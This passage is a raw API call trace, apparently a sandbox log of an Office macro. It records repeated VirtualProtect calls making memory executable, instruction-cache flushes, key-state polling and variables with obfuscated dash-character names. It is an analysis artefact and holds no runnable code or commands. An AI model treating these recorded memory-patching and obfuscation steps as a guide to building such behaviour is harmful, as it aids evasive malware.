lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.356] GetCurrentProcess () returned 0xffffffff [0102.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.356] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.357] GetCurrentProcess () returned 0xffffffff [0102.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.357] GetCurrentProcess () returned 0xffffffff [0102.357] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.357] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.358] GetCurrentProcess () returned 0xffffffff [0102.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.358] GetCurrentProcess () returned 0xffffffff [0102.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.358] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.358] GetCurrentProcess () returned 0xffffffff [0102.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.358] GetCurrentProcess () returned 0xffffffff [0102.358] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.358] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.359] GetCurrentProcess () returned 0xffffffff [0102.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.359] GetCurrentProcess () returned 0xffffffff [0102.359] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.359] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.360] GetCurrentProcess () returned 0xffffffff [0102.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.360] GetCurrentProcess () returned 0xffffffff [0102.360] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.360] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.361] GetCurrentProcess () returned 0xffffffff [0102.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.361] GetCurrentProcess () returned 0xffffffff [0102.361] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.361] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.362] GetCurrentProcess () returned 0xffffffff [0102.362] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.362] GetCurrentProcess () returned 0xffffffff [0102.362] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.362] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.362] GetCurrentProcess () returned 0xffffffff [0102.362] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.363] GetCurrentProcess () returned 0xffffffff [0102.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.363] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.363] GetCurrentProcess () returned 0xffffffff [0102.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.363] GetCurrentProcess () returned 0xffffffff [0102.363] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.363] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.364] GetCurrentProcess () returned 0xffffffff [0102.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.364] GetCurrentProcess () returned 0xffffffff [0102.364] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.364] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.365] GetCurrentProcess () returned 0xffffffff [0102.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.365] GetCurrentProcess () returned 0xffffffff [0102.365] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.365] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.366] GetCurrentProcess () returned 0xffffffff [0102.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.366] GetCurrentProcess () returned 0xffffffff [0102.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.366] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.366] GetCurrentProcess () returned 0xffffffff [0102.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.366] GetCurrentProcess () returned 0xffffffff [0102.366] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.366] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.367] GetCurrentProcess () returned 0xffffffff [0102.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.367] GetCurrentProcess () returned 0xffffffff [0102.367] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.367] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.368] GetCurrentProcess () returned 0xffffffff [0102.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.368] GetCurrentProcess () returned 0xffffffff [0102.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.368] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.368] GetCurrentProcess () returned 0xffffffff [0102.368] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.369] GetAsyncKeyState (vKey=3) returned 0 [0102.370] CRetailMalloc_Alloc () returned 0xca3d160 [0102.370] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.370] memcpy (in: _Dst=0xcb65290, _Src=0x197404, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0102.370] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.370] memcpy (in: _Dst=0xcb65188, _Src=0x1973bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.370] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount2=-1) returned 3 [0102.370] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount2=-1) returned 3 [0102.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432e7e, cbMultiByte=22, lpWideCharStr=0x197204, cchWideChar=23 | out: lpWideCharStr="—––———–—–––—––––—–—–—") returned 22 [0102.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b04c2, cbMultiByte=22, lpWideCharStr=0x197264, cchWideChar=23 | out: lpWideCharStr="—––———–—–––—––––—–—–—") returned 22 [0102.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b04c2, cbMultiByte=22, lpWideCharStr=0x197264, cchWideChar=23 | out: lpWideCharStr="—––———–—–––—––––—–—–—") returned 22 [0102.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b04c2, cbMultiByte=22, lpWideCharStr=0x197264, cchWideChar=23 | out: lpWideCharStr="—––———–—–––—––––—–—–—") returned 22 [0102.371] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x97\x97\x96\x96\x96\x97\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x96", cchCount1=-1, lpString2="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount2=-1) returned 3 [0102.371] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x97\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x97\x97\x97\x97\x97\x96", cchCount1=-1, lpString2="\x97\x96\x96\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x97\x96\x97", cchCount2=-1) returned 3 [0102.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b04c2, cbMultiByte=22, lpWideCharStr=0x197264, cchWideChar=23 | out: lpWideCharStr="—––———–—–––—––––—–—–—") returned 22 [0102.371] CRetailMalloc_Alloc () returned 0xca0f620 [0102.371] _mbscpy_s (in: _Dst=0xca0f620, _DstSizeInBytes=0x16, _Src=0x112b04c2 | out: _Dst=0xca0f620) returned 0x0 [0102.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0be2, cbMultiByte=29, lpWideCharStr=0x197274, cchWideChar=30 | out: lpWideCharStr="_B_var_—––———–—–––—––––—–—–—") returned 29 [0102.372] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x16, _Src=0x112b04c2 | out: _Dst=0x1972dc) returned 0x0 [0102.372] CRetailMalloc_Free () returned 0x1 [0102.372] memcpy (in: _Dst=0xcb65290, _Src=0xcb65290, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0102.372] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.372] memcpy (in: _Dst=0xcb6518c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.372] memcpy (in: _Dst=0xcb65188, _Src=0x197254, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.372] memcpy (in: _Dst=0xcb65188, _Src=0x197254, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.372] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.372] memcpy (in: _Dst=0xcb65188, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.372] memcpy (in: _Dst=0xca3d1d4, _Src=0x197484, _Size=0x18 | out: _Dst=0xca3d1d4) returned 0xca3d1d4 [0102.372] CRetailMalloc_Realloc () returned 0xca3d160 [0102.372] CRetailMalloc_Free () returned 0x1 [0102.372] GetCurrentProcess () returned 0xffffffff [0102.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.373] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.373] GetCurrentProcess () returned 0xffffffff [0102.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.373] GetCurrentProcess () returned 0xffffffff [0102.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.373] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.374] GetCurrentProcess () returned 0xffffffff [0102.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.374] GetCurrentProcess () returned 0xffffffff [0102.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.374] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.375] GetCurrentProcess () returned 0xffffffff [0102.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.375] GetCurrentProcess () returned 0xffffffff [0102.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.375] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.375] GetCurrentProcess () returned 0xffffffff [0102.375] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.375] GetCurrentProcess () returned 0xffffffff [0102.376] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.376] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.379] GetCurrentProcess () returned 0xffffffff [0102.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.379] GetCurrentProcess () returned 0xffffffff [0102.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.379] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.379] GetCurrentProcess () returned 0xffffffff [0102.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.379] GetCurrentProcess () returned 0xffffffff [0102.379] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.379] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.380] GetCurrentProcess () returned 0xffffffff [0102.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.380] GetCurrentProcess () returned 0xffffffff [0102.380] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.380] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.381] GetCurrentProcess () returned 0xffffffff [0102.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.381] GetCurrentProcess () returned 0xffffffff [0102.381] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.381] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.382] GetCurrentProcess () returned 0xffffffff [0102.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.382] GetCurrentProcess () returned 0xffffffff [0102.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.382] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.382] GetCurrentProcess () returned 0xffffffff [0102.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.382] GetCurrentProcess () returned 0xffffffff [0102.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.382] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.383] GetCurrentProcess () returned 0xffffffff [0102.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.383] GetCurrentProcess () returned 0xffffffff [0102.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.383] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.383] GetCurrentProcess () returned 0xffffffff [0102.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.383] GetCurrentProcess () returned 0xffffffff [0102.383] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.383] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.384] GetCurrentProcess () returned 0xffffffff [0102.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.384] GetCurrentProcess () returned 0xffffffff [0102.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.384] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.384] GetCurrentProcess () returned 0xffffffff [0102.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.384] GetCurrentProcess () returned 0xffffffff [0102.384] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.384] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.385] GetCurrentProcess () returned 0xffffffff [0102.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.385] GetCurrentProcess () returned 0xffffffff [0102.385] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.385] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.386] GetCurrentProcess () returned 0xffffffff [0102.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.386] GetCurrentProcess () returned 0xffffffff [0102.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.386] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.386] GetCurrentProcess () returned 0xffffffff [0102.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.386] GetCurrentProcess () returned 0xffffffff [0102.386] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.386] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.387] GetCurrentProcess () returned 0xffffffff [0102.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.387] GetCurrentProcess () returned 0xffffffff [0102.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.387] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.387] GetCurrentProcess () returned 0xffffffff [0102.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.387] GetCurrentProcess () returned 0xffffffff [0102.387] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.387] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.388] GetCurrentProcess () returned 0xffffffff [0102.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.388] GetCurrentProcess () returned 0xffffffff [0102.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.388] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.388] GetCurrentProcess () returned 0xffffffff [0102.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.388] GetCurrentProcess () returned 0xffffffff [0102.388] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.389] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.389] GetCurrentProcess () returned 0xffffffff [0102.389] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.390] GetCurrentProcess () returned 0xffffffff [0102.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.390] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.390] GetCurrentProcess () returned 0xffffffff [0102.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.390] GetCurrentProcess () returned 0xffffffff [0102.390] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.390] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.391] GetCurrentProcess () returned 0xffffffff [0102.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.391] GetCurrentProcess () returned 0xffffffff [0102.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.391] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.391] GetCurrentProcess () returned 0xffffffff [0102.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.391] GetCurrentProcess () returned 0xffffffff [0102.391] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.391] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.392] GetCurrentProcess () returned 0xffffffff [0102.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.392] GetCurrentProcess () returned 0xffffffff [0102.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.392] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.392] GetCurrentProcess () returned 0xffffffff [0102.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.392] GetCurrentProcess () returned 0xffffffff [0102.392] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.392] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.393] GetCurrentProcess () returned 0xffffffff [0102.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.393] GetCurrentProcess () returned 0xffffffff [0102.393] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.393] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.395] GetCurrentProcess () returned 0xffffffff [0102.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.395] GetCurrentProcess () returned 0xffffffff [0102.395] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.395] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.396] GetCurrentProcess () returned 0xffffffff [0102.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.396] GetCurrentProcess () returned 0xffffffff [0102.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.396] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0102.396] GetCurrentProcess () returned 0xffffffff [0102.396] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.397] GetAsyncKeyState (vKey=3) returned 0 [0102.397] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.397] VarCmp 